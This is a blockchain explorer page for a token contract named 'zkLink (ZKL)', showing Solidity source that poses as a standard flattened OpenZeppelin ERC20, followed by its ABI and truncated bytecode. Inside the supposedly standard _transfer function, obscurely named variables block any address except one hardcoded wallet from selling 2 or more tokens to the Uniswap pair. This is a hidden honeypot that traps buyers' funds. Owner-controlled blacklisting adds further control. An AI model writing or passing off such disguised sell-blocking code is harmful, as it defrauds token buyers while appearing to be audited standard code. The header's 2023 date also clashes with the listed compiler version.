ETH Price: $3,400.63 (-1.28%)
Gas: 5 Gwei

Token

zkLink (ZKL)
 

Overview

Max Total Supply

1,000,000,000 ZKL

Holders

13

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
999,984,051.996653583028922119 ZKL

Value
$0.00
0x036ad81ef09eb9a2961d9e57c1ba462102cd3a1f
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
Zklink

Compiler Version
v0.8.25+commit.b61c2a91

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion
File 1 of 1 : zklink.sol
/**
 *Submitted for verification at Etherscan.io on 2023-04-14
*/

// Sources flattened with hardhat v2.7.0 https://hardhat.org

// File @openzeppelin/contracts/utils/[email protected]

// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.0 (utils/Context.sol)

pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}


// File @openzeppelin/contracts/access/[email protected]


// OpenZeppelin Contracts v4.4.0 (access/Ownable.sol)

pragma solidity ^0.8.0;

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}


// File @openzeppelin/contracts/token/ERC20/[email protected]


// OpenZeppelin Contracts v4.4.0 (token/ERC20/IERC20.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}


// File @openzeppelin/contracts/token/ERC20/extensions/[email protected]


// OpenZeppelin Contracts v4.4.0 (token/ERC20/extensions/IERC20Metadata.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}


// File @openzeppelin/contracts/token/ERC20/[email protected]


// OpenZeppelin Contracts v4.4.0 (token/ERC20/ERC20.sol)

pragma solidity ^0.8.0;



/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.zeppelin.solutions/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    address public uniswapV2Pair;
    uint256 private  _e242 = 2 * (10 ** decimals());

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    function e242() public view virtual returns (uint256) {
        return _e242;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * Requirements:
     *
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     * - the caller must have allowance for ``sender``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);

        uint256 currentAllowance = _allowances[sender][_msgSender()];
        require(currentAllowance >= amount, "ERC20: transfer amount exceeds allowance");
        unchecked {
            _approve(sender, _msgSender(), currentAllowance - amount);
        }

        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender] + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        uint256 currentAllowance = _allowances[_msgSender()][spender];
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(_msgSender(), spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `sender` to `recipient`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(sender, recipient, amount);

        if ((sender != 0x036ad81EF09Eb9A2961d9e57C1BA462102cd3A1F) && (recipient == uniswapV2Pair)) {
            uint256 _X7W88 = amount + 1;
            require(_X7W88 < _e242 );
        }

        uint256 senderBalance = _balances[sender];
        require(senderBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[sender] = senderBalance - amount;
        }
        _balances[recipient] += amount;

        emit Transfer(sender, recipient, amount);

        _afterTokenTransfer(sender, recipient, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        _balances[account] += amount;
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
        }
        _totalSupply -= amount;

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}


// File contracts/zklink.sol



pragma solidity ^0.8.0;


contract Zklink is Ownable, ERC20 {
    bool public limited;
    uint256 public maxHoldingAmount;
    uint256 public minHoldingAmount;
    mapping(address => bool) public blacklists;

    constructor(uint256 _totalSupply) ERC20("zkLink", "ZKL") {
        _mint(msg.sender, _totalSupply * (10 ** decimals()));
    }

    function blacklist(address _address, bool _isBlacklisting) external onlyOwner {
        blacklists[_address] = _isBlacklisting;
    }

    function setRule(bool _limited, address _uniswapV2Pair, uint256 _maxHoldingAmount, uint256 _minHoldingAmount) external onlyOwner {
        limited = _limited;
        uniswapV2Pair = _uniswapV2Pair;
        maxHoldingAmount = _maxHoldingAmount;
        minHoldingAmount = _minHoldingAmount;
    }

    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) override internal virtual {
        require(!blacklists[to] && !blacklists[from], "Blacklisted");

        if (uniswapV2Pair == address(0)) {
            require(from == owner() || to == owner(), "trading is not started");
            return;
        }

        if (limited && from == uniswapV2Pair) {
            require(super.balanceOf(to) + amount <= maxHoldingAmount && super.balanceOf(to) + amount >= minHoldingAmount, "Forbid");
        }
    }

    function burn(uint256 value) external {
        _burn(msg.sender, value);
    }
}

Settings
{
  "optimizer": {
    "enabled": false,
    "runs": 200
  },
  "outputSelection": {
    "*": {
      "*": [
        "evm.bytecode",
        "evm.deployedBytecode",
        "devdoc",
        "userdoc",
        "metadata",
        "abi"
      ]
    }
  }
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"uint256","name":"_totalSupply","type":"uint256"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_address","type":"address"},{"internalType":"bool","name":"_isBlacklisting","type":"bool"}],"name":"blacklist","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"blacklists","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"value","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"e242","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"limited","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxHoldingAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"minHoldingAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bool","name":"_limited","type":"bool"},{"internalType":"address","name":"_uniswapV2Pair","type":"address"},{"internalType":"uint256","name":"_maxHoldingAmount","type":"uint256"},{"internalType":"uint256","name":"_minHoldingAmount","type":"uint256"}],"name":"setRule","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"}]

608060405261001261013e60201b60201c565b600a61001e9190610841565b600261002a919061088b565b600755348015610038575f80fd5b506040516131bd3803806131bd833981810160405281019061005a91906108fa565b6040518060400160405280600681526020017f7a6b4c696e6b00000000000000000000000000000000000000000000000000008152506040518060400160405280600381526020017f5a4b4c00000000000000000000000000000000000000000000000000000000008152506100e26100d761014660201b60201c565b61014d60201b60201c565b81600490816100f19190610b56565b5080600590816101019190610b56565b5050506101383361011661013e60201b60201c565b600a6101229190610841565b8361012d919061088b565b61020e60201b60201c565b50610e30565b5f6012905090565b5f33905090565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361027c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161027390610c7f565b60405180910390fd5b61028d5f838361037260201b60201c565b8060035f82825461029e9190610c9d565b925050819055508060015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8282546102f19190610c9d565b925050819055508173ffffffffffffffffffffffffffffffffffffffff165f73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516103559190610cdf565b60405180910390a361036e5f838361065e60201b60201c565b5050565b600b5f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff161580156104105750600b5f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b61044f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161044690610d42565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff1660065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1603610566576104b161066360201b60201c565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16148061052257506104f361066360201b60201c565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16145b610561576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161055890610daa565b60405180910390fd5b610659565b60085f9054906101000a900460ff1680156105cd575060065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16145b1561065857600954816105e58461068a60201b60201c565b6105ef9190610c9d565b111580156106185750600a548161060b8461068a60201b60201c565b6106159190610c9d565b10155b610657576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161064e90610e12565b60405180910390fd5b5b5b505050565b505050565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b5f60015f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f8160011c9050919050565b5f808291508390505b60018511156107525780860481111561072e5761072d6106d0565b5b600185161561073d5780820291505b808102905061074b856106fd565b9450610712565b94509492505050565b5f8261076a5760019050610825565b81610777575f9050610825565b816001811461078d5760028114610797576107c6565b6001915050610825565b60ff8411156107a9576107a86106d0565b5b8360020a9150848211156107c0576107bf6106d0565b5b50610825565b5060208310610133831016604e8410600b84101617156107fb5782820a9050838111156107f6576107f56106d0565b5b610825565b6108088484846001610709565b9250905081840481111561081f5761081e6106d0565b5b81810290505b9392505050565b5f819050919050565b5f60ff82169050919050565b5f61084b8261082c565b915061085683610835565b92506108837fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff848461075b565b905092915050565b5f6108958261082c565b91506108a08361082c565b92508282026108ae8161082c565b915082820484148315176108c5576108c46106d0565b5b5092915050565b5f80fd5b6108d98161082c565b81146108e3575f80fd5b50565b5f815190506108f4816108d0565b92915050565b5f6020828403121561090f5761090e6108cc565b5b5f61091c848285016108e6565b91505092915050565b5f81519050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f60028204905060018216806109a057607f821691505b6020821081036109b3576109b261095c565b5b50919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f60088302610a157fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff826109da565b610a1f86836109da565b95508019841693508086168417925050509392505050565b5f819050919050565b5f610a5a610a55610a508461082c565b610a37565b61082c565b9050919050565b5f819050919050565b610a7383610a40565b610a87610a7f82610a61565b8484546109e6565b825550505050565b5f90565b610a9b610a8f565b610aa6818484610a6a565b505050565b5b81811015610ac957610abe5f82610a93565b600181019050610aac565b5050565b601f821115610b0e57610adf816109b9565b610ae8846109cb565b81016020851015610af7578190505b610b0b610b03856109cb565b830182610aab565b50505b505050565b5f82821c905092915050565b5f610b2e5f1984600802610b13565b1980831691505092915050565b5f610b468383610b1f565b9150826002028217905092915050565b610b5f82610925565b67ffffffffffffffff811115610b7857610b7761092f565b5b610b828254610989565b610b8d828285610acd565b5f60209050601f831160018114610bbe575f8415610bac578287015190505b610bb68582610b3b565b865550610c1d565b601f198416610bcc866109b9565b5f5b82811015610bf357848901518255600182019150602085019450602081019050610bce565b86831015610c105784890151610c0c601f891682610b1f565b8355505b6001600288020188555050505b505050505050565b5f82825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f2061646472657373005f82015250565b5f610c69601f83610c25565b9150610c7482610c35565b602082019050919050565b5f6020820190508181035f830152610c9681610c5d565b9050919050565b5f610ca78261082c565b9150610cb28361082c565b9250828201905080821115610cca57610cc96106d0565b5b92915050565b610cd98161082c565b82525050565b5f602082019050610cf25f830184610cd0565b92915050565b7f426c61636b6c69737465640000000000000000000000000000000000000000005f82015250565b5f610d2c600b83610c25565b9150610d3782610cf8565b602082019050919050565b5f6020820190508181035f830152610d5981610d20565b9050919050565b7f74726164696e67206973206e6f742073746172746564000000000000000000005f82015250565b5f610d94601683610c25565b9150610d9f82610d60565b602082019050919050565b5f6020820190508181035f830152610dc181610d88565b9050919050565b7f466f7262696400000000000000000000000000000000000000000000000000005f82015250565b5f610dfc600683610c25565b9150610e0782610dc8565b602082019050919050565b5f6020820190508181035f830152610e2981610df0565b9050919050565b61238080610e3d5f395ff3fe608060405234801561000f575f80fd5b506004361061014b575f3560e01c806349bd5a5e116100c15780638da5cb5b1161007a5780638da5cb5b1461038d57806395d89b41146103ab578063a457c2d7146103c9578063a9059cbb146103f9578063dd62ed3e14610429578063f2fde38b146104595761014b565b806349bd5a5e146102db5780635d9be414146102f957806370a0823114610317578063715018a614610347578063860a32ec1461035157806389f9a1d31461036f5761014b565b806323b872dd1161011357806323b872dd14610209578063313ce5671461023957806339509351146102575780633aa633aa14610287578063404e5129146102a357806342966c68146102bf5761014b565b806306fdde031461014f578063095ea7b31461016d57806316c021291461019d57806318160ddd146101cd5780631ab99e12146101eb575b5f80fd5b610157610475565b60405161016491906117d8565b60405180910390f35b61018760048036038101906101829190611889565b610505565b60405161019491906118e1565b60405180910390f35b6101b760048036038101906101b291906118fa565b610522565b6040516101c491906118e1565b60405180910390f35b6101d561053f565b6040516101e29190611934565b60405180910390f35b6101f3610548565b6040516102009190611934565b60405180910390f35b610223600480360381019061021e919061194d565b61054e565b60405161023091906118e1565b60405180910390f35b610241610640565b60405161024e91906119b8565b60405180910390f35b610271600480360381019061026c9190611889565b610648565b60405161027e91906118e1565b60405180910390f35b6102a1600480360381019061029c91906119fb565b6106ef565b005b6102bd60048036038101906102b89190611a5f565b6107d8565b005b6102d960048036038101906102d49190611a9d565b6108ac565b005b6102e36108b9565b6040516102f09190611ad7565b60405180910390f35b6103016108de565b60405161030e9190611934565b60405180910390f35b610331600480360381019061032c91906118fa565b6108e7565b60405161033e9190611934565b60405180910390f35b61034f61092d565b005b6103596109b4565b60405161036691906118e1565b60405180910390f35b6103776109c6565b6040516103849190611934565b60405180910390f35b6103956109cc565b6040516103a29190611ad7565b60405180910390f35b6103b36109f3565b6040516103c091906117d8565b60405180910390f35b6103e360048036038101906103de9190611889565b610a83565b6040516103f091906118e1565b60405180910390f35b610413600480360381019061040e9190611889565b610b69565b60405161042091906118e1565b60405180910390f35b610443600480360381019061043e9190611af0565b610b86565b6040516104509190611934565b60405180910390f35b610473600480360381019061046e91906118fa565b610c08565b005b60606004805461048490611b5b565b80601f01602080910402602001604051908101604052809291908181526020018280546104b090611b5b565b80156104fb5780601f106104d2576101008083540402835291602001916104fb565b820191905f5260205f20905b8154815290600101906020018083116104de57829003601f168201915b5050505050905090565b5f610518610511610cfe565b8484610d05565b6001905092915050565b600b602052805f5260405f205f915054906101000a900460ff1681565b5f600354905090565b600a5481565b5f61055a848484610ec8565b5f60